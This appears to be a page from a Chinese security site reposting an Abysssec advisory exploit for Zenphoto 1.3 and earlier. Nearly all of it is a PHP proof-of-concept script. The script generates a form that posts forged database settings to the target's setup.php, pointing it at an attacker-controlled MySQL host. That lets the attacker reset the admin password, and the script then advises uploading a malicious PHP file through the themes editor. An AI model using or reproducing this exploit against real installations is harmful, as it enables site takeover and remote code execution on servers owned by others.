首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Zenphoto Config Update and Command Execute Vulnerability
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-27  

<?php
/*

  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/moaub-26-zenphoto-config-update-and-command-execute-vulnerability/

Abysssec Inc Public Advisory
 
 
  Title            :  Zenphoto Config Update and Command Execute Vulnerability
  Affected Version :  Zenphoto <= 1.3
  Discovery        :  www.abysssec.com
  Vendor           :  http://www.zenphoto.org
 
*/


$path = "http://www.site.com/zenphoto" ."/" . "zp-core/setup.php";
$new_mysql_user = "abysssec";
$new_mysql_pass = "absssec";
$new_mysql_host = "abysssec.com";
$new_mysql_database = "abysssec_database";
$new_mysql_prefix = "zp_";
echo "<html><head></head>
<style>
body {font-family:tahoma;font-size:14px}
</style>

<body>";
echo "Zen Photo Image Gallery 1.3 Reset admin Password <br>
 By : Abysssec @ Inc <br>www.Abysssec.com<hr>
 <form method='POST' action='$path' >
 <input type=hidden name='mysql' value='yes'>
 <input type=hidden name='mysql_user' value='$new_mysql_user'>
 <input type=hidden name='mysql_pass' value='$new_mysql_pass'>
 <input type=hidden name='mysql_host' value='$new_mysql_host'>
 <input type=hidden name='mysql_database' value='$new_mysql_database'>
 <input type=hidden name='mysql_prefix' value='$new_mysql_prefix'>
 After click on below , if target will can connect to your Mysql_Host :<br>
 You Must view 'GO !' Messege ...<br>
 Click on & wait ....
 <br> Then , You need to set your admin user and password.<br><hr>
 Upload file:<br>
 you can Edit themes From themes Tab and Upload your malignant PHP file.<br>
 <input type=submit value='Send Your Setting '>
 </form>
 ";
echo "</body></html>";
?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows Mobile 6.5 TR (WinCE 5
·Microsoft Cinepak Codec CVDeco
·BS.Player 2.56 (Build 1043) .m
·OvBB V0.16a Forum Remote SQL I
·Gokhun ASP Stok v1.0 Multiple
·TRAIDNT UP Version 3.0 Remote
·MP3 Player Utilities 3.57 (AMV
·VirIT eXplorer Lite DLL Hijack
·Apple Software Update 2.1.1.11
·Embarcadero Delphi XE (2011) D
·Apple Software Update 2.1.1.11
·E-Xoopport - Samsara <= v3.1 (
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved